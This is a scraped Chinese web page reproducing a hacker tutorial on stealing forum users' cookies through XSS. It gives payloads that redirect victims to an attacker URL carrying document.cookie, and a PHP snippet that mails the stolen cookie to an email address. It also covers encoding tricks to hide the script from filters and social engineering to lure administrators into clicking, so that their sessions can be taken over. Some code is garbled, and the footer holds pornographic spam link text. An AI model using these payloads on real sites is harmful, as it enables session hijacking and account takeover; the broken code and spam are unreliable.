• <fieldset id="8imwq"><menu id="8imwq"></menu></fieldset>
  • <bdo id="8imwq"><input id="8imwq"></input></bdo>
    最新文章專題視頻專題問答1問答10問答100問答1000問答2000關鍵字專題1關鍵字專題50關鍵字專題500關鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關鍵字專題關鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
    問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
    當前位置: 首頁 - 科技 - 知識百科 - 正文

    XSS攻擊Cookie欺騙中隱藏JavaScript執行

    來源:懂視網 責編:小采 時間:2020-11-27 20:31:22
    文檔

    XSS攻擊Cookie欺騙中隱藏JavaScript執行

    XSS攻擊Cookie欺騙中隱藏JavaScript執行:比如發現一處可XSS地方:<script>alert(不管怎么樣彈出就好)</script>自己弄個偷cookie的文件。目的是讓其他瀏覽者去瀏覽我們設計好的陷阱<script>document.location=http://URL.com/cookie.phpcooki
    推薦度:
    導讀XSS攻擊Cookie欺騙中隱藏JavaScript執行:比如發現一處可XSS地方:<script>alert(不管怎么樣彈出就好)</script>自己弄個偷cookie的文件。目的是讓其他瀏覽者去瀏覽我們設計好的陷阱<script>document.location=http://URL.com/cookie.phpcooki

    比如發現一處可XSS地方:
    <script>alert(不管怎么樣彈出就好)</script>

    自己弄個偷cookie的文件。

    目的是讓其他瀏覽者去瀏覽我們設計好的陷阱
    <script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>

    怎么弄其實也不用我多說了。

    現在主要說的是如何隱藏JavaScript執行。

    大家可能習慣每天去milw0rm.com看EXP,

    每當發布XSS漏洞的EXP,當我們利用的時候。

    卻無法cookie任何信息,這是為什么呢。

    像魔力,PHPBB這樣大型的論壇都具備XSS漏洞。

    我給的這個
    <script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>

    會顯示Javascript 錯誤。

    解決辦法有2種,我們可以把外部敏感信息用unicode編碼

    給個URL:http://www.mikezilla.com/exp0012.html

    通過編碼就是這樣:
    <script>eval(location.href="http://www.php1.cn/">
    上述還不行就用第2種方法

    Javascript fromCharCode中的eval功能

    上面說了可以用unicode編碼過一些站

    比如編碼后的104,116,116,112就是HTTP

    如果論壇用了其他的編輯器,比如PHPWind 用的所見所得編輯器

    直接打上http://url.com肯定會暴露。

    那么我們就看編輯器的形式來調換URL

    比如偷COOKIE的站是http://www.URL.com

    我們就這樣
    http://www.url.com

    當然顯示的部分你可以替換成吸引人的信息騙取管理和斑竹的點擊

    用一點社會工程學就可以了。

    好了現在都完成了初步的設想,開始實現吧

    第1步:管理看見我們構造好的陷阱,并且點了他

    第2步:Javascript 執行成功了。。

    第3步:構造好的偷COOKIE文件偷取到Cookie

    第4步:我們不可能傻到URL連接是純文本,將URL用Unicode編碼(這里習慣說是加密)http://www.mikezilla.com/exp0012.html

    第5步:截取的Cookie信息當然不是明文的,我們只要使用FireFox Cookie 編輯器
    替換COOKIE就OK了,或者用CookieEditor等其他工具。

    個人建議:偷取Cookie不一定就使用空間收取Cookie信息
    比如構造個郵箱收取就這樣
    <?

    mail("hackeroo@hotmail.com","cookie monster",$_REQUEST[cookie]);

    ?>
    <html>
    <script>document.location=http://www.URL.com/'</script>
    </html>

    好了偷到有價值的信息替換Cookie就行了。替換斑竹的就是斑竹權限,替換管理的就和是管理權限。

    聲明:本網頁內容旨在傳播知識,若有侵權等問題請及時與本網聯系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

    文檔

    XSS攻擊Cookie欺騙中隱藏JavaScript執行

    XSS攻擊Cookie欺騙中隱藏JavaScript執行:比如發現一處可XSS地方:<script>alert(不管怎么樣彈出就好)</script>自己弄個偷cookie的文件。目的是讓其他瀏覽者去瀏覽我們設計好的陷阱<script>document.location=http://URL.com/cookie.phpcooki
    推薦度:
    • 熱門焦點

    最新推薦

    猜你喜歡

    熱門推薦

    專題
    Top
    主站蜘蛛池模板: 久久久久久亚洲精品成人| 亚洲精品美女久久777777| 尤物yw午夜国产精品视频| 国产亚洲欧美精品久久久| 精品国产成人国产在线观看| 国语自产少妇精品视频蜜桃| 精品露脸国产偷人在视频| 久久精品国产只有精品2020| 亚洲国产精品一区二区成人片国内| 秋霞久久国产精品电影院| 欧美精品www| 久久亚洲国产欧洲精品一| 日韩精品无码中文字幕一区二区| 国产日韩精品中文字无码| 亚洲?V乱码久久精品蜜桃 | 人妻精品久久无码专区精东影业| 人妻少妇偷人精品无码| 久久精品国产国产精品四凭| 国产精品成人99久久久久| 久久精品视频免费| 国产精品分类视频分类一区| 四虎国产精品永久在线| 伊人久久综合精品无码AV专区| 99久久人妻无码精品系列| 亚洲精品自产拍在线观看| 亚洲国产精品ⅴa在线观看| 国内精品久久久久久中文字幕| 无码精品久久久天天影视| 欧美黑人巨大videos精品| 久久精品国产亚洲Aⅴ香蕉| 97久久精品人人澡人人爽| 亚洲一二成人精品区| 久久久国产精品网站| 国产精品1024香蕉在线观看| 国产精品久久波多野结衣| 国产精品久久久久久福利69堂| 亚洲精品人成无码中文毛片 | 国产高清在线精品一本大道| 99精品国产成人一区二区| 久久精品国产91久久麻豆自制| 下载天堂国产AV成人无码精品网站|